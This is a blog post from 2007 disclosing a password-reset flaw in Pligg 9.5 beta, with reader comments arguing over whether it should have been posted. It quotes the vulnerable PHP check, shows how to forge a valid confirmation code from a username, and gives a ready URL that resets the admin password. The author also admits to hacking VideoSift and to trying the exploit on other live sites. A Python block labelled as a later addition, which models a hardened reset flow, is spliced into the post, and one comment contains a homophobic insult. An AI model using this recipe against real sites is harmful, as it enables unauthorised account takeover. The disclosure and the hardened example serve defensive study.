Hacking Pligg 9.5 beta – Exploit

Pligg is a Social Bookmarking Web 2.0 Content Management System based on the popular social news website Digg.com.

A security flaw makes it possible to change the password of any user and log in.

VideoSift is hacked! VideoSift is one of the largest (though still small) websites that use Pligg.

Admin Charter - VideoSift Changing God’s Password - VideoSift

How it works:
To reset a forgotten password, Pligg follows the classic process: a confirmation code is generated and sent by e-mail to the user's mailbox. The user has to follow the link containing the confirmation code, and if the confirmation code is verified successfully, the password is reset to a pre-defined value.

Part of the source code responsible for this check is shown below:

pligg_dir/libs/html1.php:

// Builds salt . sha1(salt . plaintext). When a salt is supplied it is
// truncated to SALT_LENGTH and reused as-is; nothing secret enters the hash.
function generateHash($plainText, $salt = null){
  if ($salt === null) { 
    $salt = substr(md5(uniqid(rand(), true)), 0, SALT_LENGTH);
  }
  else {
    $salt = substr($salt, 0, SALT_LENGTH); 
  }
  return $salt . sha1($salt . $plainText);
}

pligg_dir/login.php:

$confirmationcode = $_GET["confirmationcode"];
// The salt is read from the first SALT_LENGTH characters of the submitted code itself,
// so the only other input to the check is the (public) username.
if(generateHash($username, substr($confirmationcode, 0, SALT_LENGTH)) == $confirmationcode){
  $db->query('UPDATE `' . table_users . '` SET `user_pass` = "033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750" WHERE `user_login`= "'.$username.'"');
  // ... remainder of the reset handling not shown in the post
}

Unfortunately, for any given username you can easily generate a confirmation code that passes the if check in login.php above: the expected value is just the salt followed by sha1(salt . username), and the salt is taken from the submitted code while the username is public.

Example:

salt = 123456789 and username = admin

we have:

sha1(123456789admin) = 1e2f566cbda0a9c855240bf21b8bae030404cad7

and thus:

$confirmationcode = 1234567891e2f566cbda0a9c855240bf21b8bae030404cad7

With the following URL you can reset the password of the user “admin”:

http://www.domain.com/login.php?processlogin=4&username=admin&confirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7
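Added here as an illustration, not code from the post or from Pligg: a Python model of the check above beside a hardened reset flow. pligg_style_code re-implements the salt . sha1(salt . username) construction (SALT_LENGTH = 9 is a constructed value; Pligg defines its own constant), and ResetTokens is an assumed replacement that issues a random, server-stored, expiring, single-use token, so a valid code can no longer be computed from the username alone.

```python
import hashlib
import hmac
import secrets
import time

SALT_LENGTH = 9  # constructed for this example; Pligg defines its own constant


def pligg_style_code(username, salt):
    """Model of the login.php check: code = salt . sha1(salt . username).
    No secret is involved, so anyone who knows a username can produce one."""
    salt = salt[:SALT_LENGTH]
    return salt + hashlib.sha1((salt + username).encode()).hexdigest()


def vulnerable_check(username, code):
    """Accepts any code whose first SALT_LENGTH chars, taken as the salt, reproduce it."""
    return pligg_style_code(username, code[:SALT_LENGTH]) == code


class ResetTokens:
    """Hardened flow: a random token is made server-side when a reset is requested,
    only its hash is stored, and it is bound to one account, time-limited and
    single-use. The token itself goes only into the e-mail link."""

    def __init__(self, ttl_seconds=3600):
        self.ttl = ttl_seconds
        self._store = {}  # username -> (sha256 hex of token, expiry timestamp)

    def issue(self, username, now=None):
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        digest = hashlib.sha256(token.encode()).hexdigest()
        self._store[username] = (digest, now + self.ttl)
        return token

    def redeem(self, username, token, now=None):
        now = time.time() if now is None else now
        entry = self._store.get(username)
        if entry is None:
            return False
        stored, expiry = entry
        if now > expiry:
            del self._store[username]  # stale token, drop it
            return False
        presented = hashlib.sha256(token.encode()).hexdigest()
        ok = hmac.compare_digest(stored, presented)  # constant-time compare
        if ok:
            del self._store[username]  # single use: a replayed link fails
        return ok
```

The `now` parameter exists only so the expiry can be exercised deterministically; in production the default wall clock is used.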

Pligg Forum members have been notified about it via e-mail this morning. Most Pligg webmasters haven’t signed up for the forum :( .
All Pligg websites I tried were vulnerable to this exploit. There is no commercial value for me, so don’t worry, administrators have been notified that it’s time to patch.


129 comments

  1. Dave Meyers said,
    May 27, 2007 @ 9:58 am

    Shame on you for posting this exploit..
    You are not helping anyone by doing this, you are only causing more problems..

  2. admin said,
    May 27, 2007 @ 10:06 am

    The exploit has been reported 2 days ago on major security websites. The patch can be found on the pligg forum.

  3. Dave Meyers said,
    May 27, 2007 @ 10:28 am

    First of all showing people HOW to EXPLOIT this is just retarded. You could have simply written an article about it and not provided the tools to everyone. Secondly if there is no commercial value for you then you shouldn’t be running adsense ads along side of it. Lastly you admit to (trying) which is hacking, into other people’s sites. P.S. It is against adsense terms of service to provide exploits along with their ads. So I suggest you make some changes before someone reports you to adsense.

  4. admin said,
    May 27, 2007 @ 10:37 am

    Whatever Dave…
    SecurityFocus
    Bugtraq
    etc…

  5. scripteaze said,
    October 7, 2007 @ 2:28 pm

    I think he should post the way he did, sometimes when people report about bugs or exploits, they don’t get fixed, now maybe they will get off their butts and fix their garbage

  6. BigNoseJew said,
    October 12, 2007 @ 6:36 pm

    dave meyers is a homo

  7. mike said,
    September 22, 2010 @ 2:14 am

    Well it might not be right but you should have emailed the concerned website about this flaw and they would have taken care of it... you know how much tension it gives when a website is hacked…
